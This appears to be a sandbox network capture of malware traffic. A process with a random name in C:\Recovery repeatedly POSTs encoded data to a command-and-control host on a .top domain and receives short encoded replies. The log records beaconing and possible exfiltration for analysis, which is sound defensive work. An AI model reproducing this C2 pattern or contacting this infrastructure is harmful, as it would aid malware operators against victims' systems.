Sep 14, 2024 12:53:55.360035896 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:55.712558031 CEST	1748	OUT	Data Raw: 56 56 59 5b 54 45 5f 5b 5e 5e 56 51 56 5e 54 52 57 5e 5c 5b 57 5b 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VVY[TE_[^^VQV^TRW^\[W[U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?!Z'..R#7$>55<[%(;%:0??P2* 0"8&F/%Z-=
Sep 14, 2024 12:53:56.044328928 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:56.241843939 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 20 04 29 42 2f 03 23 04 0d 0c 2b 2c 22 11 2b 32 08 15 2b 2c 23 18 28 27 35 58 29 03 33 18 30 3f 2f 02 27 57 36 06 24 37 2f 56 35 3b 2e 5a 0c 1d 23 5a 34 0a 2d 00 26 28 2a 11 24 57 36 15 37 32 33 5d 32 38 2e 05 36 2f 07 04 3c 16 3a 08 29 31 2d 10 29 13 3e 40 2c 04 2d 0a 37 12 23 51 00 10 26 51 31 00 21 13 21 27 2a 0c 29 0f 29 5d 25 1c 31 0f 24 38 31 00 32 3b 36 00 33 33 01 5c 20 22 2f 1f 33 2f 3b 1a 34 30 2d 1b 3f 04 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: )B/#+,"+2+,#('5X)30?/'W6$7/V5;.Z#Z4-&($W6723]28.6/<:)1-)>@,-7#Q&Q1!!'))]%1$812;633\ "/3/;40-?#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	62817	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:55.360222101 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:55.712485075 CEST	1012	OUT	Data Raw: 53 55 59 5c 51 45 5a 58 5e 5e 56 51 56 53 54 5f 57 51 5c 5d 57 5d 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SUY\QEZX^^VQVST_WQ\]W]UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(Y'S!>5!3\%?*9'V27=Y,<&F/%Z-
Sep 14, 2024 12:53:56.026160002 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:56.152390003 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	62818	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:56.308146954 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:56.665586948 CEST	1012	OUT	Data Raw: 56 51 5c 5c 54 46 5a 5c 5e 5e 56 51 56 52 54 53 57 55 5c 5f 57 5b 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQ\\TFZ\^^VQVRTSWU\_W[U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X,$>&5>.Z5?0$_'$:#P%5_40"/,&F/%Z-
Sep 14, 2024 12:53:57.002110958 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:57.138061047 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	62819	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:57.285962105 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:57.634428024 CEST	1012	OUT	Data Raw: 53 52 59 5c 51 45 5a 59 5e 5e 56 51 56 53 54 59 57 54 5c 5b 57 5a 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SRY\QEZY^^VQVSTYWT\[WZU^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]<<.3--!(X**6(Y$('%9<?4%& !,<&F/%Z-
Sep 14, 2024 12:53:57.962913036 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:58.150911093 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	62820	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:58.285222054 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:58.634613991 CEST	1012	OUT	Data Raw: 56 50 5c 5b 51 43 5a 58 5e 5e 56 51 56 5a 54 5c 57 52 5c 5d 57 5f 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VP\[QCZX^^VQVZT\WR\]W_U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,)$.#$(Y*2"?(0+ Y%:?<+V1\57U)/,&F/%Z--
Sep 14, 2024 12:53:58.978037119 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:59.114250898 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	62821	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:59.448843956 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:59.806260109 CEST	1012	OUT	Data Raw: 56 55 59 55 54 45 5a 5a 5e 5e 56 51 56 5e 54 52 57 5e 5c 5f 57 5d 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VUYUTEZZ^^VQV^TRW^\_W]UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?&=2#'Z)="#?$8'%[)2*731X;<&F/%Z-=
Sep 14, 2024 12:54:00.125212908 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:00.253166914 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	62822	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:00.388796091 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:00.743928909 CEST	1012	OUT	Data Raw: 53 53 5c 59 54 45 5a 5a 5e 5e 56 51 56 53 54 59 57 57 5c 55 57 58 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SS\YTEZZ^^VQVSTYWW\UWXU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<<$"$ \*=#?83?%:(02)9]4#>;,&F/%Z-
Sep 14, 2024 12:54:01.063442945 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:01.194641113 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	62823	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:01.251064062 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:01.603207111 CEST	1748	OUT	Data Raw: 53 55 59 5a 54 48 5a 53 5e 5e 56 51 56 52 54 59 57 56 5c 5f 57 5e 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SUYZTHZS^^VQVRTYWV\_W^U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<%'-!51"/8$(1?X*9%:=X4[,<&F/%Z-
Sep 14, 2024 12:54:01.930979967 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:02.101443052 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 15 3e 1a 3f 07 37 29 2c 18 28 2c 2e 13 3e 22 0b 01 3d 02 33 17 3e 1a 32 01 2a 2e 33 57 30 02 27 04 26 31 2a 01 30 37 28 09 36 01 2e 5a 0c 1d 20 05 23 0a 2e 58 31 2b 2a 5a 27 0f 00 1a 34 0c 20 01 25 15 21 5a 35 3c 39 01 3c 28 32 0b 29 1f 32 0d 3e 3d 0c 0a 3b 2d 0f 09 23 12 23 51 00 10 26 50 26 00 35 11 36 19 13 11 29 31 35 58 26 25 2e 50 30 3b 22 59 32 16 3e 07 30 23 27 5c 21 1c 2b 5b 27 12 38 05 22 33 2d 53 2b 04 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #>?7),(,.>"=3>2.3W0'&107(6.Z #.X1+*Z'4 %!Z5<9<(2)2>=;-##Q&P&56)15X&%.P0;"Y2>0#'\!+['8"3-S+#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	62824	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:01.330517054 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:01.681251049 CEST	1012	OUT	Data Raw: 56 5e 5c 5c 51 45 5f 59 5e 5e 56 51 56 5c 54 5e 57 52 5c 5c 57 5e 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^\\QE_Y^^VQV\T^WR\\W^UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?'=!(=15<?$(#1?*3V%:5 #5\;<&F/%Z-
Sep 14, 2024 12:54:02.003211975 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:02.211747885 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	62825	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:02.466883898 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:02.821909904 CEST	1012	OUT	Data Raw: 53 57 59 5a 54 41 5a 5a 5e 5e 56 51 56 53 54 5b 57 5f 5c 5b 57 50 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWYZTAZZ^^VQVST[W_\[WPUZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+?=0=>V"8*[="/4Y'(^1#[()1758<&F/%Z-
Sep 14, 2024 12:54:03.139471054 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:03.274552107 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	62826	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:03.404781103 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:03.759346962 CEST	1012	OUT	Data Raw: 53 57 59 5c 54 44 5a 58 5e 5e 56 51 56 53 54 53 57 50 5c 5a 57 5d 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWY\TDZX^^VQVSTSWP\ZW]UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+)3!>"]5X0#10(/&_ 068&F/%Z-
Sep 14, 2024 12:54:04.097634077 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:04.230067968 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	62827	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:04.358150959 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:04.712531090 CEST	1012	OUT	Data Raw: 53 53 59 5e 51 46 5a 5e 5e 5e 56 51 56 5c 54 5f 57 51 5c 5e 57 51 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SSY^QFZ^^^VQV\T_WQ\^WQUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%,9'.!7])1#?;%(,&*)/Q&6##2;,&F/%Z-
Sep 14, 2024 12:54:05.025028944 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:05.156704903 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	62828	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:05.979633093 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:06.337461948 CEST	1012	OUT	Data Raw: 56 52 59 5e 51 44 5a 59 5e 5e 56 51 56 59 54 5d 57 53 5c 54 57 5d 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VRY^QDZY^^VQVYT]WS\TW]U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\<'%#'X==%5[0?%)+[(9<19%\!#*,<&F/%Z-!
Sep 14, 2024 12:54:06.653438091 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:06.788264036 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	62829	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:06.936491013 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	62830	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:07.126223087 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:07.478183031 CEST	1748	OUT	Data Raw: 56 53 59 55 54 44 5f 5f 5e 5e 56 51 56 58 54 59 57 51 5c 5f 57 59 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSYUTD__^^VQVXTYWQ\_WYUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+=_3-!!Q4)2Z!/$8Y24(97P&=\#9[;<&F/%Z-%
Sep 14, 2024 12:54:07.810712099 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:07.944142103 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 5d 3e 27 23 07 37 03 28 51 28 3f 22 12 29 32 08 15 2a 12 37 5f 2a 1a 3e 05 3d 03 05 18 33 2f 34 5c 33 21 32 05 27 27 33 56 23 2b 2e 5a 0c 1d 20 04 37 55 26 5c 25 2b 3e 59 27 08 22 5d 23 21 38 04 27 2b 21 5b 21 2c 3e 5d 28 01 2a 0f 2a 1f 2a 0e 29 3d 3a 41 2f 13 00 19 21 38 23 51 00 10 26 19 25 3d 25 13 21 19 3d 52 2a 22 25 13 31 35 26 13 30 38 31 05 32 06 21 58 30 23 23 5b 21 0c 2c 01 33 05 3f 15 23 20 32 08 3f 04 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #]>'#7(Q(?")27_>=3/4\3!2''3V#+.Z 7U&\%+>Y'"]#!8'+![!,>](**)=:A/!8#Q&%=%!=R"%15&0812!X0##[!,3?# 2?#R+(W>\M
